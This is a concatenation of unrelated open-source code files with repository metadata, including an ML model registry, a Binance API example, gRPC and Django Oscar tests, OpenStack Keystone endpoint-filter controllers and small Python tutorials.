                                          'linear svc dist']),
    'linear svm regressor': (LinearSVR, ['base linear svr',
                                         'linear svr dist']),
    'sgd classifier': (SGDClassifier, ['default', 'sgd elastic classifier',
                                       'sgd classifier big search']),
    'sgd regressor': (SGDRegressor, ['default', 'sgd elastic']),
    'gb classifier': (GradientBoostingClassifier, ['default']),
    'gb regressor': (GradientBoostingRegressor, ['default']),
    'hgb classifier': (HistGradientBoostingClassifier, ['default', 'hgb dist1']),
    'hgb regressor': (HistGradientBoostingRegressor, ['default', 'hgb dist1']),
    'et classifier': (ExtraTreesClassifier, ['default']),
    'et regressor': (ExtraTreesRegressor, ['default']),
    'pa classifier': (PassiveAggressiveClassifier, ['default']),
    'bayesian ridge regressor': (BayesianRidge, ['default']),
    'ard regressor': (ARDRegression, ['default']),
    'tweedie regressor': (TweedieRegressor, ['default']),
}
# Optionally register XGBoost estimators when the package is installed.
try:
    with warnings.catch_warnings():
        # XGBoost can emit FutureWarnings at import time; keep it quiet.
        warnings.simplefilter(action='ignore', category=FutureWarning)
        from xgboost import XGBClassifier, XGBRegressor

    AVAILABLE['binary']['xgb'] = 'xgb classifier'
    AVAILABLE['regression']['xgb'] = 'xgb regressor'
    AVAILABLE['categorical']['xgb'] = 'xgb classifier'

    MODELS['xgb regressor'] = (XGBRegressor, ['base xgb', 'xgb dist1',
                                              'xgb dist2', 'xgb dist3'])
    MODELS['xgb classifier'] = (XGBClassifier, ['base xgb classifier',
                                                'xgb classifier dist1',
                                                'xgb classifier dist2',
                                                'xgb classifier dist3'])
except ImportError:
    # XGBoost is an optional dependency; skip registration if missing.
    pass
# Optionally register LightGBM estimators when the package is installed.
try:
    from ...extensions.BPtLGBM import BPtLGBMRegressor, BPtLGBMClassifier

    AVAILABLE['binary']['light gbm'] = 'light gbm classifier'
    AVAILABLE['binary']['lgbm'] = 'light gbm classifier'
    AVAILABLE['categorical']['light gbm'] = 'light gbm classifier'
    AVAILABLE['categorical']['lgbm'] = 'light gbm classifier'
    AVAILABLE['regression']['light gbm'] = 'light gbm regressor'
    AVAILABLE['regression']['lgbm'] = 'light gbm regressor'

    MODELS['light gbm regressor'] = (BPtLGBMRegressor, ['base lgbm',
                                                        'lgbm dist1',
                                                        'lgbm dist2',
                                                        'lgbm dist3'])
    MODELS['light gbm classifier'] = (BPtLGBMClassifier,
                                      ['base lgbm',
                                       'lgbm classifier dist1',
                                       'lgbm classifier dist2',
                                       'lgbm classifier dist3'])
except ImportError:
    # LightGBM is an optional dependency; skip registration if missing.
    pass
def get_base_model_and_params(model_type, extra_params, model_type_params,
                              random_state=None, **kwargs):
    """Resolve *model_type* through MODELS and instantiate the estimator.

    Parameters
    ----------
    model_type : str
        Canonical model name (a key of MODELS).
    extra_params : dict
        User-supplied constructor overrides, forwarded to
        get_obj_and_params.
    model_type_params : object
        Selector for which registered parameter distribution to use.
    random_state : optional
        NOTE(review): accepted but never used in this function —
        presumably injected elsewhere; confirm before relying on it.
    **kwargs :
        Absorbed for call-signature compatibility; ignored here.

    Returns
    -------
    tuple
        (instantiated estimator, selected parameter distributions).
    """
    model, extra_model_params, model_type_params =\
        get_obj_and_params(model_type, MODELS, extra_params, model_type_params)

    return model(**extra_model_params), model_type_params
# Flat collection of every registered canonical model name.
# NOTE(review): 'avaliable' looks like a typo for 'available', but the
# helper is defined with that name in ..helpers, so it is kept here.
all_obj_keys = all_from_avaliable(AVAILABLE)
| 45.040909 | 81 | 0.497729 |
d2fab4618e57e94265d61357e0e27bb8dd71bad1 | 459 | py | Python | example_d/market/get_liquidation_orders.py | BestResources/Binance_Futures_python | 3d08810d4b1cdb7f88d25fdf41a4207bfb8b6f94 | [
"MIT"
] | 640 | 2020-01-16T05:00:13.000Z | 2022-03-30T08:40:26.000Z | example_d/market/get_liquidation_orders.py | BestResources/Binance_Futures_python | 3d08810d4b1cdb7f88d25fdf41a4207bfb8b6f94 | [
"MIT"
] | 140 | 2020-01-19T20:27:35.000Z | 2022-03-28T08:28:43.000Z | example_d/market/get_liquidation_orders.py | BestResources/Binance_Futures_python | 3d08810d4b1cdb7f88d25fdf41a4207bfb8b6f94 | [
"MIT"
] | 391 | 2020-01-15T07:12:26.000Z | 2022-03-31T14:24:19.000Z | from binance_d import RequestClient
from binance_d.constant.test import *
from binance_d.base.printobject import *
# Build an authenticated client; g_api_key / g_secret_key come from the
# binance_d.constant.test star-import above.
request_client = RequestClient(api_key=g_api_key, secret_key=g_secret_key)
# result = request_client.get_liquidation_orders()
# Fetch liquidation orders for one coin-margined symbol (the commented call
# above would query without a symbol filter).
result = request_client.get_liquidation_orders(symbol="btcusd_200925")
print("======= Get all Liquidation Orders =======")
# PrintMix (from binance_d.base.printobject) presumably pretty-prints the
# response object field by field -- confirm against the library.
PrintMix.print_data(result)
print("==========================================")
| 35.307692 | 75 | 0.701525 |
a84b4a5c71500fb98e8c27668be3a1674d9f89b7 | 1,428 | py | Python | src/python/grpcio_tests/tests_aio/unit/init_test.py | gluk-w/grpc | 9fac907f806c3a9b9b775b15d8e3cb387c4d7048 | [
"Apache-2.0"
] | 1 | 2021-09-04T19:49:25.000Z | 2021-09-04T19:49:25.000Z | src/python/grpcio_tests/tests_aio/unit/init_test.py | gluk-w/grpc | 9fac907f806c3a9b9b775b15d8e3cb387c4d7048 | [
"Apache-2.0"
] | null | null | null | src/python/grpcio_tests/tests_aio/unit/init_test.py | gluk-w/grpc | 9fac907f806c3a9b9b775b15d8e3cb387c4d7048 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The gRPC Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import unittest
from tests_aio.unit._test_base import AioTestBase
class TestInit(AioTestBase):
    """Smoke tests that grpc's aio API is reachable via every import style.

    The imports are deliberately performed inside each test body so each
    case exercises its own import path in isolation; do not hoist them.
    """
    async def test_grpc(self):
        # Access aio through the top-level grpc package.
        import grpc  # pylint: disable=wrong-import-position
        channel = grpc.aio.insecure_channel('dummy')
        self.assertIsInstance(channel, grpc.aio.Channel)
    async def test_grpc_dot_aio(self):
        # Import the aio submodule explicitly.
        import grpc.aio  # pylint: disable=wrong-import-position
        channel = grpc.aio.insecure_channel('dummy')
        self.assertIsInstance(channel, grpc.aio.Channel)
    async def test_aio_from_grpc(self):
        # Bind the submodule via a from-import.
        from grpc import aio  # pylint: disable=wrong-import-position
        channel = aio.insecure_channel('dummy')
        self.assertIsInstance(channel, aio.Channel)
# Allow running this test module directly with verbose debug logging.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    unittest.main(verbosity=2)
| 34.829268 | 74 | 0.734594 |
0365e6d6aba8e755fdbbf1f737a8a1a1e4f38092 | 1,539 | py | Python | Chapters/07.ShortestPathProblems/parcour_tools.py | ntienvu/SelectedTopicsOptimization | 069659ca9754cc7fd884b654a06157cc7da6f963 | [
"MIT"
] | 1 | 2021-01-01T13:01:38.000Z | 2021-01-01T13:01:38.000Z | Chapters/07.ShortestPathProblems/parcour_tools.py | ntienvu/SelectedTopicsOptimization | 069659ca9754cc7fd884b654a06157cc7da6f963 | [
"MIT"
] | null | null | null | Chapters/07.ShortestPathProblems/parcour_tools.py | ntienvu/SelectedTopicsOptimization | 069659ca9754cc7fd884b654a06157cc7da6f963 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed 6 Apr 2016
Last update on Thu 7 Apr 2016
@author: michielstock
Some routines to work with the parcours and mazes
for shortest path algorithms
"""
import numpy as np
from random import choice, randint
from shortestpaths import red
def links_to_graph(links):
    """Convert an iterable of (u, v) links into an undirected adjacency dict.

    Parameters
    ----------
    links : iterable of (node, node) pairs

    Returns
    -------
    dict mapping each node to a list of ``(1, neighbour)`` tuples; every
    edge gets unit weight and is inserted in both directions.
    """
    graph = {}
    for u, v in links:
        # setdefault replaces the original's separate membership checks.
        graph.setdefault(u, []).append((1, v))
        graph.setdefault(v, []).append((1, u))
    return graph
def plot_parcour(links, ax, line_width=5):
    """Draw a maze/parcour on *ax* as white segments on a black background.

    Parameters
    ----------
    links : iterable of ((x1, y1), (x2, y2)) pairs
        The segments to draw.
    ax : matplotlib-like axes object
        Must provide plot/set_xlim/set_ylim and a background-colour setter.
    line_width : int
        Width of the drawn segments.
    """
    max_x = 0
    max_y = 0
    for (i1, j1), (i2, j2) in links:
        ax.plot([i1, i2], [j1, j2], c='white', lw=line_width)
        # Grow the axis limits (plus a half-cell margin) to fit each segment.
        if max(i1, i2) > max_x:
            max_x = max(i1, i2) + 0.5
        if max(j1, j2) > max_y:
            max_y = max(j1, j2) + 0.5
    ax.set_xlim([-0.5, max_x])
    ax.set_ylim([-0.5, max_y])
    # Fix: Axes.set_axis_bgcolor was deprecated in matplotlib 2.0 and later
    # removed; prefer set_facecolor, falling back for very old versions.
    if hasattr(ax, 'set_facecolor'):
        ax.set_facecolor('black')
    else:
        ax.set_axis_bgcolor('black')
def add_path(path, ax, color=red):
    """Overlay *path* (a sequence of (x, y) points) on *ax*.

    Consecutive points are joined by line segments drawn in *color*.
    """
    for (x0, y0), (x1, y1) in zip(path, path[1:]):
        ax.plot([x0, x1], [y0, y1], c=color, lw=2)
def load_links(name):
    """Read links from a CSV-style file.

    Each non-empty line must contain four comma-separated integers
    ``x1,y1,x2,y2``; it is parsed into the link ``((x1, y1), (x2, y2))``.

    Returns
    -------
    set of ((int, int), (int, int)) tuples.
    """
    links = set()
    # 'with' guarantees the handle is closed (the original leaked it).
    with open(name, 'r') as file_handler:
        for line in file_handler:
            # Tolerate blank lines (e.g. a trailing newline at EOF).
            if not line.strip():
                continue
            i1, j1, i2, j2 = map(int, line.rstrip().split(','))
            links.add(((i1, j1), (i2, j2)))
    return links
| 24.822581 | 61 | 0.554906 |
dcc39ebe01ee528abd60c4718d115ec197ae4830 | 1,549 | py | Python | test/testers/winforms/splitter_vertical/__init__.py | ABEMBARKA/monoUI | 5fda266ad2db8f89580a40b525973d86cd8de939 | [
"MIT"
] | 1 | 2019-08-13T15:22:12.000Z | 2019-08-13T15:22:12.000Z | test/testers/winforms/splitter_vertical/__init__.py | ABEMBARKA/monoUI | 5fda266ad2db8f89580a40b525973d86cd8de939 | [
"MIT"
] | null | null | null | test/testers/winforms/splitter_vertical/__init__.py | ABEMBARKA/monoUI | 5fda266ad2db8f89580a40b525973d86cd8de939 | [
"MIT"
] | 1 | 2019-08-13T15:22:17.000Z | 2019-08-13T15:22:17.000Z | ##############################################################################
# Written by: Brian G. Merrell <bgmerrell@novell.com>
# Date: 01/26/2009
# Application wrapper for splitter.py
# Used by the splitter-*.py tests
##############################################################################
'Application wrapper for splitter'
from strongwind import *
from os.path import exists
from sys import path
def launchSplitter(exe=None):
    'Launch splitter with accessibility enabled and return a splitter object. Log an error and return None if something goes wrong'
    # NOTE: Python 2 source (old-style raise below); part of the strongwind
    # UI-automation test harness.
    if exe is None:
        # make sure we can find the sample application
        # path[0] is the harness directory; strip two path components to get
        # the uiaqa root, under which the sample apps live.
        harness_dir = path[0]
        i = harness_dir.rfind("/")
        j = harness_dir[:i].rfind("/")
        uiaqa_path = harness_dir[:j]
        exe = '%s/samples/winforms/splitter_vertical.py' % uiaqa_path
    if not exists(exe):
        raise IOError, "Could not find file %s" % exe
    args = [exe]
    # Launch via strongwind's cache helper under the 'ipy' (IronPython)
    # runner, waiting config.LONG_DELAY for the app to come up.
    (app, subproc) = cache.launchApplication(args=args, name='ipy', wait=config.LONG_DELAY)
    splitter = Splitter(app, subproc)
    cache.addApplication(splitter)
    # Give the frame a back-reference to the application wrapper.
    splitter.splitterFrame.app = splitter
    return splitter
# class to represent the application
class Splitter(accessibles.Application):
    def __init__(self, accessible, subproc=None):
        'Get a reference to the splitter window'
        super(Splitter, self).__init__(accessible, subproc)
        # Locate the main window by its title; log it under 'Splitter'.
        self.findFrame("Vertical Splitter", logName='Splitter')
| 31.612245 | 132 | 0.601033 |
4930903f737a09c0bcae95d6fef31c981b2905db | 12,150 | py | Python | keystone/contrib/endpoint_filter/controllers.py | TampereTC/tre-smartcity-keystone | e2d0adc25165eef102c87d7991fb1a595680fda6 | [
"Apache-2.0"
] | null | null | null | keystone/contrib/endpoint_filter/controllers.py | TampereTC/tre-smartcity-keystone | e2d0adc25165eef102c87d7991fb1a595680fda6 | [
"Apache-2.0"
] | null | null | null | keystone/contrib/endpoint_filter/controllers.py | TampereTC/tre-smartcity-keystone | e2d0adc25165eef102c87d7991fb1a595680fda6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from keystone import assignment
from keystone.catalog import controllers as catalog_controllers
from keystone.common import controller
from keystone.common import dependency
from keystone import exception
from keystone import notifications
@dependency.requires('assignment_api', 'catalog_api', 'endpoint_filter_api')
class _ControllerBase(controller.V3Controller):
    """Base behaviors for endpoint filter controllers."""
    def _get_endpoint_groups_for_project(self, project_id):
        """Return the endpoint groups associated with *project_id*.

        Returns [] when the project has no endpoint group associations.
        """
        # recover the project endpoint group memberships and for each
        # membership recover the endpoint group
        # (get_project is called for its side effect -- presumably to
        # validate the project exists before listing; result is discarded)
        self.assignment_api.get_project(project_id)
        try:
            refs = self.endpoint_filter_api.list_endpoint_groups_for_project(
                project_id)
            endpoint_groups = [self.endpoint_filter_api.get_endpoint_group(
                ref.endpoint_group_id) for ref in refs]
            return endpoint_groups
        except exception.EndpointGroupNotFound:
            return []
    def _get_endpoints_filtered_by_endpoint_group(self, endpoint_group_id):
        """Return catalog endpoints matching *all* of the group's filters."""
        endpoints = self.catalog_api.list_endpoints()
        filters = self.endpoint_filter_api.get_endpoint_group(
            endpoint_group_id)['filters']
        filtered_endpoints = []
        for endpoint in endpoints:
            # An endpoint qualifies only if every filter key/value matches.
            is_candidate = True
            for key, value in six.iteritems(filters):
                if endpoint[key] != value:
                    is_candidate = False
                    break
            if is_candidate:
                filtered_endpoints.append(endpoint)
        return filtered_endpoints
class EndpointFilterV3Controller(_ControllerBase):
    """V3 API controller for project <-> endpoint associations."""
    def __init__(self):
        super(EndpointFilterV3Controller, self).__init__()
        # Keep associations consistent: when a project or endpoint is
        # deleted elsewhere, drop any filter associations that mention it.
        notifications.register_event_callback(
            notifications.ACTIONS.deleted, 'project',
            self._on_project_or_endpoint_delete)
        notifications.register_event_callback(
            notifications.ACTIONS.deleted, 'endpoint',
            self._on_project_or_endpoint_delete)
    def _on_project_or_endpoint_delete(self, service, resource_type, operation,
                                       payload):
        """Notification hook: cascade-delete associations for the resource."""
        project_or_endpoint_id = payload['resource_info']
        if resource_type == 'project':
            self.endpoint_filter_api.delete_association_by_project(
                project_or_endpoint_id)
        else:
            self.endpoint_filter_api.delete_association_by_endpoint(
                project_or_endpoint_id)
    @controller.protected()
    def add_endpoint_to_project(self, context, project_id, endpoint_id):
        """Establishes an association between an endpoint and a project."""
        # NOTE(gyee): we just need to make sure endpoint and project exist
        # first. We don't really care whether if project is disabled.
        # The relationship can still be established even with a disabled
        # project as there are no security implications.
        self.catalog_api.get_endpoint(endpoint_id)
        self.assignment_api.get_project(project_id)
        self.endpoint_filter_api.add_endpoint_to_project(endpoint_id,
                                                         project_id)
    @controller.protected()
    def check_endpoint_in_project(self, context, project_id, endpoint_id):
        """Verifies endpoint is currently associated with given project."""
        self.catalog_api.get_endpoint(endpoint_id)
        self.assignment_api.get_project(project_id)
        self.endpoint_filter_api.check_endpoint_in_project(endpoint_id,
                                                           project_id)
    @controller.protected()
    def list_endpoints_for_project(self, context, project_id):
        """List all endpoints currently associated with a given project."""
        self.assignment_api.get_project(project_id)
        refs = self.endpoint_filter_api.list_filtered_endpoints_for_project(
            project_id)
        return catalog_controllers.EndpointV3.wrap_collection(
            context, refs)
    @controller.protected()
    def remove_endpoint_from_project(self, context, project_id, endpoint_id):
        """Remove the endpoint from the association with given project."""
        # NOTE(review): unlike add/check above, no existence validation is
        # performed before removal -- confirm that is intentional.
        self.endpoint_filter_api.remove_endpoint_from_project(endpoint_id,
                                                              project_id)
    @controller.protected()
    def list_projects_for_endpoint(self, context, endpoint_id):
        """Return a list of projects associated with the endpoint."""
        self.catalog_api.get_endpoint(endpoint_id)
        refs = self.endpoint_filter_api.list_projects_for_endpoint(endpoint_id)
        projects = [self.assignment_api.get_project(
            ref.project_id) for ref in refs]
        return assignment.controllers.ProjectV3.wrap_collection(context,
                                                                projects)
class EndpointGroupV3Controller(_ControllerBase):
    """V3 API controller for CRUD operations on endpoint groups."""
    collection_name = 'endpoint_groups'
    member_name = 'endpoint_group'
    # Only these keys may appear in an endpoint group's 'filters' dict.
    VALID_FILTER_KEYS = ['service_id', 'region_id', 'interface']
    def __init__(self):
        super(EndpointGroupV3Controller, self).__init__()
    @controller.protected()
    def create_endpoint_group(self, context, endpoint_group):
        """Creates an Endpoint Group with the associated filters."""
        ref = self._assign_unique_id(self._normalize_dict(endpoint_group))
        # 'filters' is mandatory and must only use whitelisted keys.
        self._require_attribute(ref, 'filters')
        self._require_valid_filter(ref)
        ref = self.endpoint_filter_api.create_endpoint_group(ref['id'], ref)
        return EndpointGroupV3Controller.wrap_member(context, ref)
    def _require_valid_filter(self, endpoint_group):
        """Raise ValidationError if any filter key is not whitelisted."""
        filters = endpoint_group.get('filters')
        for key in six.iterkeys(filters):
            if key not in self.VALID_FILTER_KEYS:
                raise exception.ValidationError(
                    attribute=self._valid_filter_keys(),
                    target='endpoint_group')
    def _valid_filter_keys(self):
        """Return the allowed filter keys as a human-readable string."""
        return ' or '.join(self.VALID_FILTER_KEYS)
    @controller.protected()
    def get_endpoint_group(self, context, endpoint_group_id):
        """Retrieve the endpoint group associated with the id if exists."""
        ref = self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
        return EndpointGroupV3Controller.wrap_member(
            context, ref)
    @controller.protected()
    def update_endpoint_group(self, context, endpoint_group_id,
                              endpoint_group):
        """Update fixed values and/or extend the filters."""
        # NOTE(review): validation runs *after* the update is persisted; an
        # invalid filter raises but the change is already stored -- confirm
        # whether this ordering is intentional.
        ref = self.endpoint_filter_api.update_endpoint_group(endpoint_group_id,
                                                             endpoint_group)
        self._require_valid_filter(ref)
        return EndpointGroupV3Controller.wrap_member(
            context, ref)
    @controller.protected()
    def delete_endpoint_group(self, context, endpoint_group_id):
        """Delete endpoint_group."""
        self.endpoint_filter_api.delete_endpoint_group(endpoint_group_id)
    @controller.protected()
    def list_endpoint_groups(self, context):
        """List all endpoint groups."""
        refs = self.endpoint_filter_api.list_endpoint_groups()
        return EndpointGroupV3Controller.wrap_collection(
            context, refs)
    @controller.protected()
    def list_endpoint_groups_for_project(self, context, project_id):
        """List all endpoint groups associated with a given project."""
        return EndpointGroupV3Controller.wrap_collection(
            context, self._get_endpoint_groups_for_project(project_id))
    @controller.protected()
    def list_projects_associated_with_endpoint_group(self,
                                                     context,
                                                     endpoint_group_id):
        """List all projects associated with endpoint group."""
        endpoint_group_refs = (self.endpoint_filter_api.
                               list_projects_associated_with_endpoint_group(
                                   endpoint_group_id))
        projects = []
        for endpoint_group_ref in endpoint_group_refs:
            project = self.assignment_api.get_project(
                endpoint_group_ref.project_id)
            if project:
                projects.append(project)
        return assignment.controllers.ProjectV3.wrap_collection(context,
                                                                projects)
    @controller.protected()
    def list_endpoints_associated_with_endpoint_group(self,
                                                      context,
                                                      endpoint_group_id):
        """List all the endpoints filtered by a specific endpoint group."""
        filtered_endpoints = self._get_endpoints_filtered_by_endpoint_group(
            endpoint_group_id)
        return catalog_controllers.EndpointV3.wrap_collection(
            context, filtered_endpoints)
class ProjectEndpointGroupV3Controller(_ControllerBase):
    """V3 API controller for project <-> endpoint-group associations."""
    collection_name = 'project_endpoint_groups'
    member_name = 'project_endpoint_group'
    def __init__(self):
        super(ProjectEndpointGroupV3Controller, self).__init__()
        # Clean up group associations when a project is deleted elsewhere.
        notifications.register_event_callback(
            notifications.ACTIONS.deleted, 'project',
            self._on_project_delete)
    def _on_project_delete(self, service, resource_type,
                           operation, payload):
        """Notification hook: drop the project's endpoint-group links."""
        project_id = payload['resource_info']
        (self.endpoint_filter_api.
            delete_endpoint_group_association_by_project(
                project_id))
    @controller.protected()
    def get_endpoint_group_in_project(self, context, endpoint_group_id,
                                      project_id):
        """Retrieve the endpoint group associated with the id if exists."""
        # Both resources are looked up first so a missing one surfaces
        # before the association query.
        self.assignment_api.get_project(project_id)
        self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
        ref = self.endpoint_filter_api.get_endpoint_group_in_project(
            endpoint_group_id, project_id)
        return ProjectEndpointGroupV3Controller.wrap_member(
            context, ref)
    @controller.protected()
    def add_endpoint_group_to_project(self, context, endpoint_group_id,
                                      project_id):
        """Creates an association between an endpoint group and project."""
        self.assignment_api.get_project(project_id)
        self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
        self.endpoint_filter_api.add_endpoint_group_to_project(
            endpoint_group_id, project_id)
    @controller.protected()
    def remove_endpoint_group_from_project(self, context, endpoint_group_id,
                                           project_id):
        """Remove the endpoint group from associated project."""
        self.assignment_api.get_project(project_id)
        self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
        self.endpoint_filter_api.remove_endpoint_group_from_project(
            endpoint_group_id, project_id)
    @classmethod
    def _add_self_referential_link(cls, context, ref):
        """Attach the member's canonical URL under ref['links']['self']."""
        url = ('/OS-EP-FILTER/endpoint_groups/%(endpoint_group_id)s'
               '/projects/%(project_id)s' % {
                   'endpoint_group_id': ref['endpoint_group_id'],
                   'project_id': ref['project_id']})
        ref.setdefault('links', {})
        ref['links']['self'] = url
| 44.343066 | 79 | 0.663621 |
0beaf59351d959dba0e445eaf87e7ecc7e0ddd4d | 479 | py | Python | python-for-beginners/06 - Dates/date_functions.py | vijayraavi/c9-python-getting-started | 345c81fb210601836d3618ff7bd491256ae62fa9 | [
"MIT"
] | 8,041 | 2019-09-17T17:25:51.000Z | 2022-03-31T11:38:07.000Z | python-for-beginners/06 - Dates/date_functions.py | magicsolmyr/c9-python-getting-started | a74d0ea8451a9709dcebbb29ae931a9cb82fc695 | [
"MIT"
] | 43 | 2019-09-20T15:47:26.000Z | 2022-01-23T20:33:28.000Z | python-for-beginners/06 - Dates/date_functions.py | magicsolmyr/c9-python-getting-started | a74d0ea8451a9709dcebbb29ae931a9cb82fc695 | [
"MIT"
] | 2,377 | 2019-09-17T18:16:53.000Z | 2022-03-30T15:38:07.000Z | #To get current date and time we need to use the datetime library
from datetime import datetime, timedelta
# datetime.now() gives the current local date and time.
today = datetime.now()
print(f'Today is: {today}')

# A timedelta is a duration; subtracting one from a datetime shifts it back.
one_day = timedelta(days=1)
yesterday = today - one_day
print(f'Yesterday was: {yesterday}')

one_week = timedelta(weeks=1)
last_week = today - one_week
print(f'Last week was: {last_week}')
| 29.9375 | 65 | 0.741127 |
a96fbc40b29ee1cde0855c7fcb2fbe1e020858f7 | 5,632 | py | Python | tests/functional/dashboard/test_review.py | DGathagu/django-oscar | ccb14ce719359cfebe24e9383afcbd54a8ca6371 | [
"BSD-3-Clause"
] | 1 | 2020-09-23T10:40:22.000Z | 2020-09-23T10:40:22.000Z | tests/functional/dashboard/test_review.py | igithub2019/django-oscar | 2429ad9e88e9a432dfa60aaca703d99860f85389 | [
"BSD-3-Clause"
] | 9 | 2020-08-11T15:19:55.000Z | 2022-03-12T00:11:12.000Z | tests/functional/dashboard/test_review.py | igithub2019/django-oscar | 2429ad9e88e9a432dfa60aaca703d99860f85389 | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta
from django.urls import reverse
from django.utils import timezone
from oscar.core.compat import get_user_model
from oscar.core.loading import get_model
from oscar.test.factories import ProductReviewFactory, UserFactory
from oscar.test.testcases import WebTestCase
# Resolve the concrete model classes via Oscar's dynamic loading.
# (User is not referenced below -- presumably kept for convenience; confirm.)
ProductReview = get_model('reviews', 'productreview')
User = get_user_model()
class ReviewsDashboardTests(WebTestCase):
    """Functional tests for the dashboard product-review list and filters."""
    # WebTestCase logs the test client in; is_staff grants dashboard access.
    is_staff = True
    def test_reviews_dashboard_is_accessible_to_staff(self):
        url = reverse('dashboard:reviews-list')
        response = self.get(url)
        self.assertIsOk(response)
    def test_bulk_editing_review_status(self):
        user1 = UserFactory()
        user2 = UserFactory()
        ProductReviewFactory(pk=1, user=user1, status=0)
        ProductReviewFactory(pk=2, user=user2, status=0)
        ProductReviewFactory(pk=3, user=user2, status=0)
        assert(ProductReview.objects.count() == 3)
        list_page = self.get(reverse('dashboard:reviews-list'))
        # forms[1] is presumably the bulk-update form on the list page.
        form = list_page.forms[1]
        form['selected_review'] = [3, 2]
        form.submit('update')
        # Only the selected reviews (2 and 3) change status; 1 stays 0.
        self.assertEqual(ProductReview.objects.get(pk=1).status, 0)
        self.assertEqual(ProductReview.objects.get(pk=2).status, 1)
        self.assertEqual(ProductReview.objects.get(pk=3).status, 1)
    def test_filter_reviews_by_name(self):
        user1 = UserFactory(first_name='Peter', last_name='Griffin')
        user2 = UserFactory(first_name='Lois', last_name='Griffin')
        ProductReviewFactory(user=user1, status=0)
        ProductReviewFactory(user=user2, status=0)
        ProductReviewFactory(user=user2, status=0)
        # Single first-name match.
        url = reverse('dashboard:reviews-list') + '?name=peter'
        response = self.get(url)
        self.assertEqual(len(response.context['review_list']), 1)
        self.assertEqual(response.context['review_list'][0].user, user1)
        # Full-name match ('+' decodes to a space in the query string).
        url = reverse('dashboard:reviews-list') + '?name=lois+griffin'
        response = self.get(url)
        self.assertEqual(len(response.context['review_list']), 2)
        for review in response.context['review_list']:
            self.assertEqual(review.user, user2)
    def test_filter_reviews_by_keyword(self):
        url = reverse('dashboard:reviews-list')
        user1 = UserFactory()
        user2 = UserFactory()
        review1 = ProductReviewFactory(user=user1, title='Sexy Review')
        review2 = ProductReviewFactory(
            user=user2, title='Anry Review', body='argh')
        ProductReviewFactory(user=user2, title='Lovely Thing')
        # Keyword matches against the body...
        response = self.get(url, params={'keyword': 'argh'})
        self.assertEqual(len(response.context['review_list']), 1)
        self.assertEqual(response.context['review_list'][0], review2)
        # ...and against the title.
        response = self.get(url, params={'keyword': 'review'})
        self.assertQuerysetContains(response.context['review_list'],
                                    [review1, review2])
    def assertQuerysetContains(self, qs, items):
        """Assert *qs* holds exactly *items*, in the same order (by id)."""
        qs_ids = [obj.id for obj in qs]
        item_ids = [item.id for item in items]
        self.assertEqual(len(qs_ids), len(item_ids))
        for i, j in zip(qs_ids, item_ids):
            self.assertEqual(i, j)
    def test_filter_reviews_by_date(self):
        def n_days_ago(days):
            """
            The tests below pass timestamps as GET parameters, but the
            ProductReviewSearchForm doesn't recognize the timezone notation.
            """
            return timezone.make_naive(
                now - timedelta(days=days), timezone=timezone.utc)
        now = timezone.now()
        # Three reviews: created now, 2 days ago and 10 days ago.
        review1 = ProductReviewFactory()
        review2 = ProductReviewFactory()
        review2.date_created = now - timedelta(days=2)
        review2.save()
        review3 = ProductReviewFactory()
        review3.date_created = now - timedelta(days=10)
        review3.save()
        url = reverse('dashboard:reviews-list')
        response = self.get(url, params={'date_from': n_days_ago(5)})
        self.assertQuerysetContains(response.context['review_list'],
                                    [review1, review2])
        response = self.get(url, params={'date_to': n_days_ago(5)})
        self.assertQuerysetContains(response.context['review_list'],
                                    [review3])
        # Both bounds combined select only the 10-day-old review.
        response = self.get(url, params={
            'date_from': n_days_ago(12),
            'date_to': n_days_ago(9),
        })
        self.assertQuerysetContains(response.context['review_list'],
                                    [review3])
    def test_filter_reviews_by_status(self):
        url = reverse('dashboard:reviews-list')
        user1 = UserFactory()
        user2 = UserFactory()
        review1 = ProductReviewFactory(user=user1, status=1)
        review2 = ProductReviewFactory(user=user2, status=0)
        review3 = ProductReviewFactory(user=user2, status=2)
        response = self.get(url, params={'status': 0})
        self.assertEqual(len(response.context['review_list']), 1)
        self.assertEqual(response.context['review_list'][0], review2)
        response = self.get(url, params={'status': 1})
        self.assertEqual(len(response.context['review_list']), 1)
        self.assertEqual(response.context['review_list'][0], review1)
        response = self.get(url, params={'status': 2})
        self.assertEqual(len(response.context['review_list']), 1)
        self.assertEqual(response.context['review_list'][0], review3)
        # Status 3 matches no review; the assertion only checks review1 is
        # present, which suggests the filter falls back to an unfiltered
        # list -- confirm against the search form's behaviour.
        response = self.get(url, params={'status': 3})
        reviews = response.context['review_list']
        self.assertTrue(review1 in reviews)
| 38.054054 | 76 | 0.643821 |
199e67012fc223fd222fb63cb605aa37bf38ed7a | 1,887 | py | Python | SunRSunS.py | PARVASHWANI/Weather-Sunrise-Sunset-Forcaster | 1b7954c72c94cd3e51fc990decbcd1ba557a0c85 | [
"MIT"
] | null | null | null | SunRSunS.py | PARVASHWANI/Weather-Sunrise-Sunset-Forcaster | 1b7954c72c94cd3e51fc990decbcd1ba557a0c85 | [
"MIT"
] | null | null | null | SunRSunS.py | PARVASHWANI/Weather-Sunrise-Sunset-Forcaster | 1b7954c72c94cd3e51fc990decbcd1ba557a0c85 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[33]:
import requests, json  # NOTE: json is unused here but kept for compatibility

